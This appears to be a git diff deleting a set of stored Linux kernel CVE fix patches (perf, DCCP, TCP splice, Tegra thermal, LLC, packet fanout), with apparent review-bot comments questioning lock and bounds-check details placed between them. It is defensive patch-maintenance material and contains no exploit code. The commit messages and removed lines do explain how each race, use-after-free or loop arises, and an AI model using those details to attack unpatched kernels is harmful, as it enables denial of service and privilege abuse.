@@ -1,159 +0,0 @@ -From 9eb0e01be831d0f37ea6278a92c32424141f55fb Mon Sep 17 00:00:00 2001 -From: Peter Zijlstra -Date: Wed, 11 Jan 2017 21:09:50 +0100 -Subject: perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race - -commit 321027c1fe77f892f4ea07846aeae08cefbbb290 upstream. - -Di Shen reported a race between two concurrent sys_perf_event_open() -calls where both try and move the same pre-existing software group -into a hardware context. - -The problem is exactly that described in commit: - - f63a8daa5812 ("perf: Fix event->ctx locking") - -... where, while we wait for a ctx->mutex acquisition, the event->ctx -relation can have changed under us. - -That very same commit failed to recognise sys_perf_event_context() as an -external access vector to the events and thereby didn't apply the -established locking rules correctly. - -So while one sys_perf_event_open() call is stuck waiting on -mutex_lock_double(), the other (which owns said locks) moves the group -about. So by the time the former sys_perf_event_open() acquires the -locks, the context we've acquired is stale (and possibly dead). - -Apply the established locking rules as per perf_event_ctx_lock_nested() -to the mutex_lock_double() for the 'move_group' case. This obviously means -we need to validate state after we acquire the locks. 
- -Reported-by: Di Shen (Keen Lab) -Tested-by: John Dias -Signed-off-by: Peter Zijlstra (Intel) -Cc: Alexander Shishkin -Cc: Arnaldo Carvalho de Melo -Cc: Arnaldo Carvalho de Melo -Cc: Jiri Olsa -Cc: Kees Cook -Cc: Linus Torvalds -Cc: Min Chong -Cc: Peter Zijlstra -Cc: Stephane Eranian -Cc: Thomas Gleixner -Cc: Vince Weaver -Fixes: f63a8daa5812 ("perf: Fix event->ctx locking") -Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net -Signed-off-by: Ingo Molnar -[bwh: Backported to 3.2: - - Use ACCESS_ONCE() instead of READ_ONCE() - - Test perf_event::group_flags instead of group_caps - - Add the err_locked cleanup block, which we didn't need before - - Adjust context] -Signed-off-by: Ben Hutchings ---- - kernel/events/core.c | 61 ++++++++++++++++++++++++++++++++++++++++++++++++---- - 1 file changed, 57 insertions(+), 4 deletions(-) - -diff --git a/kernel/events/core.c b/kernel/events/core.c -index a301c68..49a1db4 100644 ---- a/kernel/events/core.c -+++ b/kernel/events/core.c -@@ -6474,6 +6474,37 @@ static void mutex_lock_double(struct mutex *a, struct mutex *b) - mutex_lock_nested(b, SINGLE_DEPTH_NESTING); - } - -+/* -+ * Variation on perf_event_ctx_lock_nested(), except we take two context -+ * mutexes. 
-+ */ -+static struct perf_event_context * -+__perf_event_ctx_lock_double(struct perf_event *group_leader, -+ struct perf_event_context *ctx) -+{ -+ struct perf_event_context *gctx; -+ -+again: -+ rcu_read_lock(); -+ gctx = ACCESS_ONCE(group_leader->ctx); -+ if (!atomic_inc_not_zero(&gctx->refcount)) { -+ rcu_read_unlock(); -+ goto again; -+ } -+ rcu_read_unlock(); -+ -+ mutex_lock_double(&gctx->mutex, &ctx->mutex); -+ -+ if (group_leader->ctx != gctx) { -+ mutex_unlock(&ctx->mutex); -+ mutex_unlock(&gctx->mutex); -+ put_ctx(gctx); -+ goto again; -+ } -+ -+ return gctx; -+} -+ - /** - * sys_perf_event_open - open a performance event, associate it to a task/cpu - * -@@ -6661,14 +6692,31 @@ SYSCALL_DEFINE5(perf_event_open, - } - - if (move_group) { -- gctx = group_leader->ctx; -+ gctx = __perf_event_ctx_lock_double(group_leader, ctx); -+ -+ /* -+ * Check if we raced against another sys_perf_event_open() call -+ * moving the software group underneath us. -+ */ -+ if (!(group_leader->group_flags & PERF_GROUP_SOFTWARE)) { -+ /* -+ * If someone moved the group out from under us, check -+ * if this new event wound up on the same ctx, if so -+ * its the regular !move_group case, otherwise fail. -+ */ -+ if (gctx != ctx) { -+ err = -EINVAL; -+ goto err_locked; -+ } else { -+ perf_event_ctx_unlock(group_leader, gctx); -+ move_group = 0; -+ } -+ } - - /* - * See perf_event_ctx_lock() for comments on the details - * of swizzling perf_event::ctx. 
- */ -- mutex_lock_double(&gctx->mutex, &ctx->mutex); -- - perf_remove_from_context(group_leader, false); - - /* -@@ -6710,7 +6758,7 @@ SYSCALL_DEFINE5(perf_event_open, - perf_unpin_context(ctx); - - if (move_group) { -- mutex_unlock(&gctx->mutex); -+ perf_event_ctx_unlock(group_leader, gctx); - put_ctx(gctx); - } - mutex_unlock(&ctx->mutex); -@@ -6737,6 +6785,11 @@ SYSCALL_DEFINE5(perf_event_open, - fd_install(event_fd, event_file); - return event_fd; - -+err_locked: -+ if (move_group) -+ perf_event_ctx_unlock(group_leader, gctx); -+ mutex_unlock(&ctx->mutex); -+ fput(event_file); - err_context: - perf_unpin_context(ctx); - put_ctx(ctx); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch b/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch deleted file mode 100644 index c4fd6944..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch +++ /dev/null 
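Review bot: The `else` branch added in sys_perf_event_open (`perf_event_ctx_unlock(group_leader, gctx); move_group = 0;`) is reached only when `gctx == ctx`, which means `__perf_event_ctx_lock_double()` has already called `mutex_lock_double(&gctx->mutex, &ctx->mutex)` with the same mutex for both arguments. Only the last line of mutex_lock_double is visible here, so whether it tolerates `a == b` cannot be confirmed from the hunk; if it does not, this case blocks on itself instead of falling back to the regular path. The helper's comment should also state its contract, e.g. `/* Returns group_leader->ctx with a reference held and both ctx mutexes locked. */`, and say what happens when the two contexts are identical. The same patch is stored again as CVE-2017-6001/^4.9/0002.patch and the point applies there unchanged.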
@@ -1,157 +0,0 @@ -From 857ea07fb0096e0964ced18ad85a1d9591562114 Mon Sep 17 00:00:00 2001 -From: Peter Zijlstra -Date: Wed, 11 Jan 2017 21:09:50 +0100 -Subject: [PATCH] perf/core: Fix concurrent sys_perf_event_open() vs. 'move_group' race - -commit 321027c1fe77f892f4ea07846aeae08cefbbb290 upstream. -commit fe525a280e8b5f04c7666fe22d1a4ef592f7b953 in 3.16.40 -bug: 37901413 - -Di Shen reported a race between two concurrent sys_perf_event_open() -calls where both try and move the same pre-existing software group -into a hardware context. - -The problem is exactly that described in commit: - - f63a8daa5812 ("perf: Fix event->ctx locking") - -... where, while we wait for a ctx->mutex acquisition, the event->ctx -relation can have changed under us. - -That very same commit failed to recognise sys_perf_event_context() as an -external access vector to the events and thereby didn't apply the -established locking rules correctly. - -So while one sys_perf_event_open() call is stuck waiting on -mutex_lock_double(), the other (which owns said locks) moves the group -about. So by the time the former sys_perf_event_open() acquires the -locks, the context we've acquired is stale (and possibly dead). - -Apply the established locking rules as per perf_event_ctx_lock_nested() -to the mutex_lock_double() for the 'move_group' case. This obviously means -we need to validate state after we acquire the locks. 
- -Reported-by: Di Shen (Keen Lab) -Tested-by: John Dias -Signed-off-by: Peter Zijlstra (Intel) -Cc: Alexander Shishkin -Cc: Arnaldo Carvalho de Melo -Cc: Arnaldo Carvalho de Melo -Cc: Jiri Olsa -Cc: Kees Cook -Cc: Linus Torvalds -Cc: Min Chong -Cc: Peter Zijlstra -Cc: Stephane Eranian -Cc: Thomas Gleixner -Cc: Vince Weaver -Fixes: f63a8daa5812 ("perf: Fix event->ctx locking") -Link: http://lkml.kernel.org/r/20170106131444.GZ3174@twins.programming.kicks-ass.net -Signed-off-by: Ingo Molnar -[bwh: Backported to 3.16: - - Use ACCESS_ONCE() instead of READ_ONCE() - - Test perf_event::group_flags instead of group_caps - - Add the err_locked cleanup block, which we didn't need before - - Adjust context] -Signed-off-by: Ben Hutchings -Signed-off-by: Suren Baghdasaryan ---- - -diff --git a/kernel/events/core.c b/kernel/events/core.c -index 1a0530f..1c53a5c 100644 ---- a/kernel/events/core.c -+++ b/kernel/events/core.c -@@ -7440,6 +7440,37 @@ - mutex_lock_nested(b, SINGLE_DEPTH_NESTING); - } - -+/* -+ * Variation on perf_event_ctx_lock_nested(), except we take two context -+ * mutexes. 
-+ */ -+static struct perf_event_context * -+__perf_event_ctx_lock_double(struct perf_event *group_leader, -+ struct perf_event_context *ctx) -+{ -+ struct perf_event_context *gctx; -+ -+again: -+ rcu_read_lock(); -+ gctx = ACCESS_ONCE(group_leader->ctx); -+ if (!atomic_inc_not_zero(&gctx->refcount)) { -+ rcu_read_unlock(); -+ goto again; -+ } -+ rcu_read_unlock(); -+ -+ mutex_lock_double(&gctx->mutex, &ctx->mutex); -+ -+ if (group_leader->ctx != gctx) { -+ mutex_unlock(&ctx->mutex); -+ mutex_unlock(&gctx->mutex); -+ put_ctx(gctx); -+ goto again; -+ } -+ -+ return gctx; -+} -+ - /** - * sys_perf_event_open - open a performance event, associate it to a task/cpu - * -@@ -7656,14 +7687,31 @@ - } - - if (move_group) { -- gctx = group_leader->ctx; -+ gctx = __perf_event_ctx_lock_double(group_leader, ctx); -+ -+ /* -+ * Check if we raced against another sys_perf_event_open() call -+ * moving the software group underneath us. -+ */ -+ if (!(group_leader->group_flags & PERF_GROUP_SOFTWARE)) { -+ /* -+ * If someone moved the group out from under us, check -+ * if this new event wound up on the same ctx, if so -+ * its the regular !move_group case, otherwise fail. -+ */ -+ if (gctx != ctx) { -+ err = -EINVAL; -+ goto err_locked; -+ } else { -+ perf_event_ctx_unlock(group_leader, gctx); -+ move_group = 0; -+ } -+ } - - /* - * See perf_event_ctx_lock() for comments on the details - * of swizzling perf_event::ctx. 
- */ -- mutex_lock_double(&gctx->mutex, &ctx->mutex); -- - perf_remove_from_context(group_leader, false); - - /* -@@ -7704,7 +7752,7 @@ - perf_unpin_context(ctx); - - if (move_group) { -- mutex_unlock(&gctx->mutex); -+ perf_event_ctx_unlock(group_leader, gctx); - put_ctx(gctx); - } - mutex_unlock(&ctx->mutex); -@@ -7733,6 +7781,11 @@ - fd_install(event_fd, event_file); - return event_fd; - -+err_locked: -+ if (move_group) -+ perf_event_ctx_unlock(group_leader, gctx); -+ mutex_unlock(&ctx->mutex); -+ fput(event_file); - err_context: - perf_unpin_context(ctx); - put_ctx(ctx); diff --git a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch.base64 deleted file mode 100644 index feef43bd..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6001/^4.9/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-6074/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6074/^4.9/0001.patch deleted file mode 100644 index 79c6a180..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6074/^4.9/0001.patch +++ /dev/null 
@@ -1,47 +0,0 @@ -From 5edabca9d4cff7f1f2b68f0bac55ef99d9798ba4 Mon Sep 17 00:00:00 2001 -From: Andrey Konovalov -Date: Thu, 16 Feb 2017 17:22:46 +0100 -Subject: dccp: fix freeing skb too early for IPV6_RECVPKTINFO - -In the current DCCP implementation an skb for a DCCP_PKT_REQUEST packet -is forcibly freed via __kfree_skb in dccp_rcv_state_process if -dccp_v6_conn_request successfully returns. - -However, if IPV6_RECVPKTINFO is set on a socket, the address of the skb -is saved to ireq->pktopts and the ref count for skb is incremented in -dccp_v6_conn_request, so skb is still in use. Nevertheless, it gets freed -in dccp_rcv_state_process. - -Fix by calling consume_skb instead of doing goto discard and therefore -calling __kfree_skb. - -Similar fixes for TCP: - -fb7e2399ec17f1004c0e0ccfd17439f8759ede01 [TCP]: skb is unexpectedly freed. -0aea76d35c9651d55bbaf746e7914e5f9ae5a25d tcp: SYN packets are now -simply consumed - -Signed-off-by: Andrey Konovalov -Acked-by: Eric Dumazet -Signed-off-by: David S. Miller ---- - net/dccp/input.c | 3 ++- - 1 file changed, 2 insertions(+), 1 deletion(-) - -diff --git a/net/dccp/input.c b/net/dccp/input.c -index ba34718..8fedc2d 100644 ---- a/net/dccp/input.c -+++ b/net/dccp/input.c -@@ -606,7 +606,8 @@ int dccp_rcv_state_process(struct sock *sk, struct sk_buff *skb, - if (inet_csk(sk)->icsk_af_ops->conn_request(sk, - skb) < 0) - return 1; -- goto discard; -+ consume_skb(skb); -+ return 0; - } - if (dh->dccph_type == DCCP_PKT_RESET) - goto discard; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6214/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6214/^4.9/0001.patch deleted file mode 100644 index f5a8edac..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6214/^4.9/0001.patch +++ /dev/null 
@@ -1,45 +0,0 @@ -From ccf7abb93af09ad0868ae9033d1ca8108bdaec82 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Fri, 3 Feb 2017 14:59:38 -0800 -Subject: tcp: avoid infinite loop in tcp_splice_read() - -Splicing from TCP socket is vulnerable when a packet with URG flag is -received and stored into receive queue. - -__tcp_splice_read() returns 0, and sk_wait_data() immediately -returns since there is the problematic skb in queue. - -This is a nice way to burn cpu (aka infinite loop) and trigger -soft lockups. - -Again, this gem was found by syzkaller tool. - -Fixes: 9c55e01c0cc8 ("[TCP]: Splice receive support.") -Signed-off-by: Eric Dumazet -Reported-by: Dmitry Vyukov -Cc: Willy Tarreau -Signed-off-by: David S. Miller ---- - net/ipv4/tcp.c | 6 ++++++ - 1 file changed, 6 insertions(+) - -diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c -index 4a04496..0efb4c7 100644 ---- a/net/ipv4/tcp.c -+++ b/net/ipv4/tcp.c -@@ -770,6 +770,12 @@ ssize_t tcp_splice_read(struct socket *sock, loff_t *ppos, - ret = -EAGAIN; - break; - } -+ /* if __tcp_splice_read() got nothing while we have -+ * an skb in receive queue, we do not want to loop. -+ * This might happen with URG data. -+ */ -+ if (!skb_queue_empty(&sk->sk_receive_queue)) -+ break; - sk_wait_data(sk, &timeo, NULL); - if (signal_pending(current)) { - ret = sock_intr_errno(timeo); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch deleted file mode 100644 index 606bc5b0..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch +++ /dev/null 
@@ -1,61 +0,0 @@ -diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c -index 1dcaba4..e08cf95 100644 ---- a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c -+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c -@@ -1613,6 +1613,9 @@ - int tstate, throt_cur_tstate, edp_cur_tstate; - unsigned long freq, cur_freq = ULONG_MAX; - -+ if (cur_state > bthrot_ins->throt_tab_size) -+ return -EINVAL; -+ - if (bthrot_ins->cur_state == cur_state) - return 0; - -diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c -index a18e4c9..1243d21 100644 ---- a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c -+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c -@@ -314,6 +314,9 @@ - struct gk20a_volt_priv *priv = (struct gk20a_volt_priv *)cdev->devdata; - struct nvkm_volt *volt = &priv->base; - -+ if (cur_state >= MAX_THERMAL_LIMITS) -+ return -EINVAL; -+ - mutex_lock(&volt->therm_lock); - - if (priv->therm_idx == cur_state) -diff --git a/drivers/soc/tegra/tegra-dvfs.c b/drivers/soc/tegra/tegra-dvfs.c -index 5c0af3b..990cd61 100644 ---- a/drivers/soc/tegra/tegra-dvfs.c -+++ b/drivers/soc/tegra/tegra-dvfs.c -@@ -1068,6 +1068,14 @@ - if (IS_ERR_OR_NULL(tegra_core_rail) || !tegra_core_rail->is_ready) - return -EINVAL; - -+ if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) { -+ if (new_idx >= rail->therm_floors_size) -+ return -EINVAL; -+ } else if (type == TEGRA_DVFS_CORE_THERMAL_CAP) { -+ if (new_idx > rail->therm_caps_size) -+ return -EINVAL; -+ } -+ - mutex_lock(&dvfs_lock); - if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) { - if (rail->therm_floor_idx != new_idx) { -diff --git a/drivers/thermal/tegra/tegra_throttle.c b/drivers/thermal/tegra/tegra_throttle.c -index 39a913e..e9991db 100644 ---- a/drivers/thermal/tegra/tegra_throttle.c -+++ b/drivers/thermal/tegra/tegra_throttle.c -@@ -198,6 +198,9 @@ - if (bthrot->cpu_freq_table == NULL) - return 0; - -+ if (cur_state > 
bthrot_ins->throt_tab_size) -+ return -EINVAL; -+ - if (bthrot_ins->cur_state == cur_state) - return 0; - diff --git a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch.base64 deleted file mode 100644 index dfe3bd98..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6274/3.18/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch deleted file mode 100644 index 606bc5b0..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch +++ /dev/null 
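Review bot: The bounds checks added by this patch disagree on whether the limit itself is a valid value. `cur_state > bthrot_ins->throt_tab_size` (gm20b.c and tegra_throttle.c) and `new_idx > rail->therm_caps_size` accept a value equal to the size, while `cur_state >= MAX_THERMAL_LIMITS` and `new_idx >= rail->therm_floors_size` reject it. The table accesses are outside the hunks, so the `>` forms may be correct if state 0 means "not throttled" and the table is read at the state minus one, but if the value indexes the table directly they allow a read one element past the end. Each check should carry a comment naming the valid range, such as `/* valid states: 0 (off) .. throt_tab_size */` where that holds, or be tightened to `>=`. The same file is stored again under CVE-2017-6275/3.18 and the point applies there unchanged.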
@@ -1,61 +0,0 @@ -diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c -index 1dcaba4..e08cf95 100644 ---- a/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c -+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/clk/gm20b.c -@@ -1613,6 +1613,9 @@ - int tstate, throt_cur_tstate, edp_cur_tstate; - unsigned long freq, cur_freq = ULONG_MAX; - -+ if (cur_state > bthrot_ins->throt_tab_size) -+ return -EINVAL; -+ - if (bthrot_ins->cur_state == cur_state) - return 0; - -diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c -index a18e4c9..1243d21 100644 ---- a/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c -+++ b/drivers/gpu/drm/nouveau/nvkm/subdev/volt/gk20a.c -@@ -314,6 +314,9 @@ - struct gk20a_volt_priv *priv = (struct gk20a_volt_priv *)cdev->devdata; - struct nvkm_volt *volt = &priv->base; - -+ if (cur_state >= MAX_THERMAL_LIMITS) -+ return -EINVAL; -+ - mutex_lock(&volt->therm_lock); - - if (priv->therm_idx == cur_state) -diff --git a/drivers/soc/tegra/tegra-dvfs.c b/drivers/soc/tegra/tegra-dvfs.c -index 5c0af3b..990cd61 100644 ---- a/drivers/soc/tegra/tegra-dvfs.c -+++ b/drivers/soc/tegra/tegra-dvfs.c -@@ -1068,6 +1068,14 @@ - if (IS_ERR_OR_NULL(tegra_core_rail) || !tegra_core_rail->is_ready) - return -EINVAL; - -+ if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) { -+ if (new_idx >= rail->therm_floors_size) -+ return -EINVAL; -+ } else if (type == TEGRA_DVFS_CORE_THERMAL_CAP) { -+ if (new_idx > rail->therm_caps_size) -+ return -EINVAL; -+ } -+ - mutex_lock(&dvfs_lock); - if (type == TEGRA_DVFS_CORE_THERMAL_FLOOR) { - if (rail->therm_floor_idx != new_idx) { -diff --git a/drivers/thermal/tegra/tegra_throttle.c b/drivers/thermal/tegra/tegra_throttle.c -index 39a913e..e9991db 100644 ---- a/drivers/thermal/tegra/tegra_throttle.c -+++ b/drivers/thermal/tegra/tegra_throttle.c -@@ -198,6 +198,9 @@ - if (bthrot->cpu_freq_table == NULL) - return 0; - -+ if (cur_state > 
bthrot_ins->throt_tab_size) -+ return -EINVAL; -+ - if (bthrot_ins->cur_state == cur_state) - return 0; - diff --git a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch.base64 deleted file mode 100644 index dfe3bd98..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6275/3.18/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-6345/^4.9/0001.patch b/Patches/Linux_CVEs/CVE-2017-6345/^4.9/0001.patch deleted file mode 100644 index 57b5bbc9..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6345/^4.9/0001.patch +++ /dev/null 
@@ -1,58 +0,0 @@ -From 8b74d439e1697110c5e5c600643e823eb1dd0762 Mon Sep 17 00:00:00 2001 -From: Eric Dumazet -Date: Sun, 12 Feb 2017 14:03:52 -0800 -Subject: net/llc: avoid BUG_ON() in skb_orphan() - -It seems nobody used LLC since linux-3.12. - -Fortunately fuzzers like syzkaller still know how to run this code, -otherwise it would be no fun. - -Setting skb->sk without skb->destructor leads to all kinds of -bugs, we now prefer to be very strict about it. - -Ideally here we would use skb_set_owner() but this helper does not exist yet, -only CAN seems to have a private helper for that. - -Fixes: 376c7311bdb6 ("net: add a temporary sanity check in skb_orphan()") -Signed-off-by: Eric Dumazet -Reported-by: Andrey Konovalov -Signed-off-by: David S. Miller ---- - net/llc/llc_conn.c | 3 +++ - net/llc/llc_sap.c | 3 +++ - 2 files changed, 6 insertions(+) - -diff --git a/net/llc/llc_conn.c b/net/llc/llc_conn.c -index 3e821da..8bc5a1b 100644 ---- a/net/llc/llc_conn.c -+++ b/net/llc/llc_conn.c -@@ -821,7 +821,10 @@ void llc_conn_handler(struct llc_sap *sap, struct sk_buff *skb) - * another trick required to cope with how the PROCOM state - * machine works. -acme - */ -+ skb_orphan(skb); -+ sock_hold(sk); - skb->sk = sk; -+ skb->destructor = sock_efree; - } - if (!sock_owned_by_user(sk)) - llc_conn_rcv(sk, skb); -diff --git a/net/llc/llc_sap.c b/net/llc/llc_sap.c -index d0e1e80..5404d0d 100644 ---- a/net/llc/llc_sap.c -+++ b/net/llc/llc_sap.c -@@ -290,7 +290,10 @@ static void llc_sap_rcv(struct llc_sap *sap, struct sk_buff *skb, - - ev->type = LLC_SAP_EV_TYPE_PDU; - ev->reason = 0; -+ skb_orphan(skb); -+ sock_hold(sk); - skb->sk = sk; -+ skb->destructor = sock_efree; - llc_sap_state_process(sap, skb); - } - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch deleted file mode 100644 index 665dc9ea..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch +++ /dev/null 
@@ -1,53 +0,0 @@ -diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c -index 05cfee7..2ae5ae2 100644 ---- a/net/packet/af_packet.c -+++ b/net/packet/af_packet.c -@@ -1429,13 +1429,16 @@ - return -EINVAL; - } - -- if (!po->running) -- return -EINVAL; -- -- if (po->fanout) -- return -EALREADY; -- - mutex_lock(&fanout_mutex); -+ -+ err = -EINVAL; -+ if (!po->running) -+ goto out; -+ -+ err = -EALREADY; -+ if (po->fanout) -+ goto out; -+ - match = NULL; - list_for_each_entry(f, &fanout_list, list) { - if (f->id == id && -@@ -1491,17 +1494,16 @@ - struct packet_sock *po = pkt_sk(sk); - struct packet_fanout *f; - -- f = po->fanout; -- if (!f) -- return; -- - mutex_lock(&fanout_mutex); -- po->fanout = NULL; -+ f = po->fanout; -+ if (f) { -+ po->fanout = NULL; - -- if (atomic_dec_and_test(&f->sk_ref)) { -- list_del(&f->list); -- dev_remove_pack(&f->prot_hook); -- kfree(f); -+ if (atomic_dec_and_test(&f->sk_ref)) { -+ list_del(&f->list); -+ dev_remove_pack(&f->prot_hook); -+ kfree(f); -+ } - } - mutex_unlock(&fanout_mutex); - } diff --git a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch.base64 deleted file mode 100644 index 57eacd49..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6346/3.18/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-6346/^4.9/0002.patch b/Patches/Linux_CVEs/CVE-2017-6346/^4.9/0002.patch deleted file mode 100644 index c92194d5..00000000 --- a/Patches/Linux_CVEs/CVE-2017-6346/^4.9/0002.patch +++ /dev/null 
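Review bot: Moving the `po->running` and `po->fanout` tests under `fanout_mutex` in fanout_add serialises them only against other fanout_add and fanout_release callers; the code that sets and clears `po->running` is not in these hunks. If that code runs under a different lock (in af_packet.c this is presumably the per-socket `po->bind_lock`, to be confirmed), the `!po->running` test can be stale by the time the socket joins the group. A comment above the test should name the lock that protects the flag, for example `/* po->running is written under <lock name>; fanout_mutex alone does not freeze it */`, and the test should be made under that lock if it differs. The ^4.9 version of this fix, CVE-2017-6346/^4.9/0002.patch, has the same test in the same place. fanout_add continues outside the hunk.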
@@ -1,126 +0,0 @@
-From d199fab63c11998a602205f7ee7ff7c05c97164b Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Tue, 14 Feb 2017 09:03:51 -0800
-Subject: packet: fix races in fanout_add()
-
-Multiple threads can call fanout_add() at the same time.
-
-We need to grab fanout_mutex earlier to avoid races that could
-lead to one thread freeing po->rollover that was set by another thread.
-
-Do the same in fanout_release(), for peace of mind, and to help us
-finding lockdep issues earlier.
-
-Fixes: dc99f600698d ("packet: Add fanout support.")
-Fixes: 0648ab70afe6 ("packet: rollover prepare: per-socket state")
-Signed-off-by: Eric Dumazet
-Cc: Willem de Bruijn
-Signed-off-by: David S. Miller
----
- net/packet/af_packet.c | 55 +++++++++++++++++++++++++++-----------------------
- 1 file changed, 30 insertions(+), 25 deletions(-)
-
-diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
-index d56ee46..0f03f6a 100644
---- a/net/packet/af_packet.c
-+++ b/net/packet/af_packet.c
-@@ -1619,6 +1619,7 @@ static void fanout_release_data(struct packet_fanout *f)
-
- static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
- {
-+ struct packet_rollover *rollover = NULL;
- struct packet_sock *po = pkt_sk(sk);
- struct packet_fanout *f, *match;
- u8 type = type_flags & 0xff;
-@@ -1641,23 +1642,28 @@ static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
- return -EINVAL;
- }
-
-+ mutex_lock(&fanout_mutex);
-+
-+ err = -EINVAL;
- if (!po->running)
-- return -EINVAL;
-+ goto out;
-
-+ err = -EALREADY;
- if (po->fanout)
-- return -EALREADY;
-+ goto out;
-
- if (type == PACKET_FANOUT_ROLLOVER ||
- (type_flags & PACKET_FANOUT_FLAG_ROLLOVER)) {
-- po->rollover = kzalloc(sizeof(*po->rollover), GFP_KERNEL);
-- if (!po->rollover)
-- return -ENOMEM;
-- atomic_long_set(&po->rollover->num, 0);
-- atomic_long_set(&po->rollover->num_huge, 0);
-- atomic_long_set(&po->rollover->num_failed, 0);
-+ err = -ENOMEM;
-+ rollover = kzalloc(sizeof(*rollover), GFP_KERNEL);
-+ if (!rollover)
-+ goto out;
-+ atomic_long_set(&rollover->num, 0);
-+ atomic_long_set(&rollover->num_huge, 0);
-+ atomic_long_set(&rollover->num_failed, 0);
-+ po->rollover = rollover;
- }
-
-- mutex_lock(&fanout_mutex);
- match = NULL;
- list_for_each_entry(f, &fanout_list, list) {
- if (f->id == id &&
-@@ -1704,11 +1710,11 @@ static int fanout_add(struct sock *sk, u16 id, u16 type_flags)
- }
- }
- out:
-- mutex_unlock(&fanout_mutex);
-- if (err) {
-- kfree(po->rollover);
-+ if (err && rollover) {
-+ kfree(rollover);
- po->rollover = NULL;
- }
-+ mutex_unlock(&fanout_mutex);
- return err;
- }
-
-@@ -1717,23 +1723,22 @@ static void fanout_release(struct sock *sk)
- struct packet_sock *po = pkt_sk(sk);
- struct packet_fanout *f;
-
-- f = po->fanout;
-- if (!f)
-- return;
--
- mutex_lock(&fanout_mutex);
-- po->fanout = NULL;
-+ f = po->fanout;
-+ if (f) {
-+ po->fanout = NULL;
-+
-+ if (atomic_dec_and_test(&f->sk_ref)) {
-+ list_del(&f->list);
-+ dev_remove_pack(&f->prot_hook);
-+ fanout_release_data(f);
-+ kfree(f);
-+ }
-
-- if (atomic_dec_and_test(&f->sk_ref)) {
-- list_del(&f->list);
-- dev_remove_pack(&f->prot_hook);
-- fanout_release_data(f);
-- kfree(f);
-+ if (po->rollover)
-+ kfree_rcu(po->rollover, rcu);
- }
- mutex_unlock(&fanout_mutex);
--
-- if (po->rollover)
-- kfree_rcu(po->rollover, rcu);
- }
-
- static bool packet_extra_vlan_len_allowed(const struct net_device *dev,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-6347/^4.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-6347/^4.10/0001.patch
deleted file mode 100644
index e0251c6e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-6347/^4.10/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
